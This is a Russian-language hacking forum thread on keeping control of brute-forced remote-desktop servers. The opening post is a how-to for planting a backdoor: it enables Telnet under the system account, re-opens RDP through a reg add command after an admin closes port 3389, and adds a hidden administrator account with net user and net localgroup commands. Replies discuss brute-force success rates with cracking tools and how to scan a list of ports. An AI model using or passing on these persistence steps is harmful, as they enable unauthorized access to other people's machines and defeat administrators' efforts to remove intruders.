Как уже ранее говорилось о неком черном ходе на дедик ,так называемый Telnet. Сейчас я обьясню как востановить доступ к утеряному дедику если админ вас спалил и закрыл порт 3389,то есть порт через который собственно говоря и работает Удаленный доступ.
Нчну с самого начала:
Вы сбрутили дедик - создали учетку - скрыли её. Вроде бы все хорошо НО есть шанс что вас спалят и перекроют вам кислород. По этому сразу после того как сбрутили не поленитесь и запустите Telnet. Что бы запустить его вам понадобится:
1.Заходим в Панель управления - Администратирование - Службы,ищем там "telnet" заходим.
2.Откроется окно,далее настраиваем:
Там мы видим меню "Тип запуска" - ставим "Авто" и жмём Пуск. Далее заходим на вкладку "Вход в систему" и выбираем Вход в систему: С системной учетной записью = Применить - Ок (Возможно придётся перезагрузить Дедик)
Все,черный ход на данный дедик у нас открыт - теперь спокойно юзаем этот дед до судного дня.
3.Если всетаки вас спалили и перекрыли порт 3389 не беда. Что бы узнать действительно ли закрыли порт надо:
Пуск > Выполнить > ping xxx.xxx.xx.xx и enter (где xxx.xxx.xx.xx IP вашего деда),если вы виидте надпись "Превышен интервал ожидания для запроса" - значит дедик прсто выключен ,беспокоится ещё рано.
А если всетаки вы видите что пакетами с вами дедик обменивается но при попытке подключения вам выдаёт ошибку на подобии такой
Значит вам перекрыли порт.
4.Идём Пуск > Выполнить > telnet должно появится такое окно
Далее пишем в этом окно "open xxx.xxx.xx.xx" где "xxx.xxx.xx.xx" IP вашего дедика. Жмем Enter ,если все зделали правильно и приконектились вас спросит яко бы вы пересылаете пароль через интернет,это не безопасно и т.д "Послать в любом случае <y/n>:Y" ;жмём Y и Enter
Далее у вас попросит ввести Login: и Password:,а вот теперь самое интересное - Пробуем вводить логин и пасс ВАШЕЙ учетки(если она у вас была скрыта и админ её не удалил вас пропустит) если все таки не получилось и админ удалил вашу учетку вводим сбрученый изначально логин и пасс - 90% что админ её не трогал - и вас впустит. Если все зделано правильно появится такое окно
Теперь что бы открыть порт необходимо ввести здесь эту команду
"reg add "HKLM\SYSTEM\CurrentControlSet\Control\Termina l Server" /v fDenyTSConnections /t reg_dword /d 0" - вводим - жмем Enter - если все правильно вас попросят подтвердить ваше действие,вводим "Y" и enter.
Все готово! Теперь можете смело подключатся.(Если ваша учетка уцелела - подключайтесь через неё,если все таки вашу учетку удалили и вы коннектились через стандартную сбрученную то можно через telnet создать себе новую такими командами:
net user admin test /add
net localgroup Administrators admin /add
net localgroup "Remote Desktop Users" admin /add
net accounts /maxpwage:unlimited
Все,доступ к компьютеру востановлен.
Если кому интеерсно могу ещё описать как сменить порт на дедике на другой порт и после чего подключатся к нему что бы никто больше его не смог сбрутить и подключится к нему.
P.S Если Админ не закрывал порт а просто сменил пароль на брученой учетке,а вашу удалил - этот способ не поможет - сейчас активно занимаюсь решением этой проблемы.
Если у кого есть что добавить по этому поводу пишите.
__________________
Но чесно говоря у меня ничего не получилось. началось всё с настройки.
Люди подскажите как найти в администратировании службу ТЕЛНЕТ.
у меня из 500 айпи 2-3 ток брутятся
да такая скупая статистика но что по делать
если повысить шанс сбрутить то брутить будет дольще намного
из 1286 всего 1 ну и за это спс, правда пользовался DUBrute2 т.к она бесплатна с трейдом до 2000 в отличии от Qtss до 10(бесплатно), но все равно ставлю тебе спасибку, еслиб не твоя тема, так бы и не интересовался, что такое прокси и прочее
Да не подскажеш пож-ста как в командной строке(или в *.bat)прописать не диапазоном, а перебором(не10-8085, а 145, 3389, и тд
Последний раз редактировалось vcxzxv3; 07.10.2010 в 21:42.
Причина: Добавлено сообщение
Регистрация: 01.08.2010
Сообщений: 110
Популярность: 654
Сказал(а) спасибо: 13
Re: Дедики или Dedicated server
Re: Дедики или Dedicated server
Ща попробую скачать
